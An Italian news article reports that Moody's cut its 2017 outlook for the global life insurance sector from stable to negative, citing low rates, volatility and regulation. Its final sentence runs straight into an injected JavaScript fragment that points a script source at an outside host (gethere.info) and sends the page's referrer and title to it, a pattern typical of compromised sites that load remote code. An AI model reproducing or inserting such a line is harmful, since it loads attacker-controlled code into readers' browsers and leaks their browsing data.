Mercato vita globale: Moody’s abbassa a negativo l’outlook 2017

L’agenzia americana Moody’s ha abbassato da ‘stabile’ a ‘negativol’outlook per il 2017 del settore dell’assicurazione vita a livello globale.

La decisione deriva dalla persistenza dei bassi tassi di interesse, dell’aumento della volatilità dei mercati finanziari e a fronte dei cambiamenti normativi.

“Nonostante i sobbalzi dopo l’elezione presidenziale Usa, i tassi d’interesse a livello storicamente basso resteranno il principale rischio per le compagnie vita globali nel 2017, continuando a deprimere i rendimenti degli investimenti e la redditività”, spiega Benjamin Serra, vice-presidente e Senior Credit Officer di Moody’s.

Un altro fattore negativo è rappresentato dalla maggiore volatilità dei mercati finanziari per l’elevato rischio geo-politico. La volatilità dei mercati non solo aumenta la volatilità degli utili da commissioni delle compagnie, ma scoraggia anche i detentori di polizze avversi al rischio ad acquistare prodotti senza garanzie.

Inoltre i cambiamenti normativi negli Usa e in Europa stanno frenando la vendita dei prodotti esistenti e controbilanciando i benefici derivanti dalla stabilizzazione della crescita economica e dal calo della disoccupazione. Moody’s vede anche un possibile aumento dell’M&A nel settore vita considerato che le compagnie stanno cercando di liberare capitale e ridurre i costi.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;